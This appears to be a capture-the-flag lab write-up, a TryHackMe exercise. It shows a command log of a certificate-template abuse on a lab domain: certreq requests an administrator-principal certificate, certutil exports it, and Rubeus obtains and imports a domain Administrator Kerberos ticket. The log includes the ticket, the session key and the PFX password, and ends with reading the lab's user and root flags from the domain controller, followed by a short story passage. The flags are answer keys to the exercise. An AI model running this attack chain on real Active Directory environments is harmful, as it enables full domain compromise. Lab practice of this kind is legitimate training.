certreq -submit -f -config "TBFC-DC1.tbfc.loc\TBFC-CA" C:\Windows\Temp\request.req C:\Windows\Temp\request.cer
RequestId: 13
RequestId: "13"
Certificate retrieved(Issued) Issued

certreq -accept -machine C:\Windows\Temp\request.cer

Installed Certificate:
  Serial Number: 5d0000000d7398e1869fbe277b00000000000d
  Subject: CN=fakeuser (Other Name:Principal Name=administrator@tbfc.loc)
  NotBefore: 12/26/2025 6:29 PM
  NotAfter: 12/26/2027 6:29 PM
  Thumbprint: 13130c25703d1ce0c0be731a53a1769002295015
  

certutil -f -p Password123! -exportpfx My "13130c25703d1ce0c0be731a53a1769002295015" C:\Windows\Temp\admin.pfx
My "Personal"
================ Certificate 2 ================
Serial Number: 5d0000000d7398e1869fbe277b00000000000d
Issuer: CN=TBFC-CA, DC=tbfc, DC=loc
 NotBefore: 12/26/2025 6:29 PM
 NotAfter: 12/26/2027 6:29 PM
Subject: CN=fakeuser
Non-root Certificate
Template: TBFCWebServer, TBFC Web Server
Cert Hash(sha1): 13130c25703d1ce0c0be731a53a1769002295015
  Key Container = 5dd1a543fe82f23d6d00d1e08323db9f_98af68bd-6d2a-4ae5-ba9e-51ab1f9a2ce0
  Simple container name: tq-TBFCWebServer-ad55562d-8bba-462e-9503-f08d35cfd69f
  Provider = Microsoft RSA SChannel Cryptographic Provider
Microsoft RSA SChannel Cryptographic Provider: KeySpec=1
AES256+RSAES_OAEP(RSA:AT_KEYEXCHANGE) test passed
Encryption test passed
Signature test passed
================ Begin force NCrypt ================
Microsoft RSA SChannel Cryptographic Provider: KeySpec=1
AES256+RSAES_OAEP(RSA:CNG) test passed
Encryption test passed (CNG)
Signature test passed (CNG)
----------------  End force NCrypt  ----------------
CertUtil: -exportPFX command completed successfully.

.\Rubeus.exe asktgt /user:Administrator /certificate:C:\Windows\Temp\admin.pfx /password:Password123! /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=fakeuser
[*] Building AS-REQ (w/ PKINIT preauth) for: 'tbfc.loc\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/tbfc.loc
  ServiceRealm          :  TBFC.LOC
  UserName              :  Administrator
  UserRealm             :  TBFC.LOC
  StartTime             :  12/26/2025 6:45:11 PM
  EndTime               :  12/27/2025 4:45:11 AM
  RenewTill             :  1/2/2026 6:45:11 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  EaTA9tNcnxaOua2QXgOsWg==

#User.txt
type \\TBFC-DC1.tbfc.loc\C$\user.txt
THM{f3336b39-5601-40ea-a4d9-8b87cb4535a6}

#Root.txt

type \\TBFC-DC1.tbfc.loc\C$\Users\Administrator\root.txt
THM{449d70b5-a212-45ca-a49b-037678f49569}

Hopper couldn't shake the memory of how he, only he, made the King's dream a reality. And after all of that, how did the King repay him? Humiliation. Incarceration. Hopper had always been overjoyed to lead the Red Team Battalion — too overjoyed, some thought. Multiple anonymous sources reported Hopper for showing "delusions of grandeur" and early signs of going "mad with power."
Surely the King would defend him? After everything Hopper had done?
What the King did was the furthest thing from that. King Malhare stripped Hopper of his title and "crowned" him the new Court Jester. With no choice but to obey, Hopper was forced to entertain the royal court day after day, month after month… until one day he failed to contain his anger and snapped back at the King.
He was immediately sent to the HopSec Asylum, where he now sits.

But as rumours spread that King Malhare finally intends to launch Operation EAST-mas, Hopper's rage ignites anew.
He must find a way out.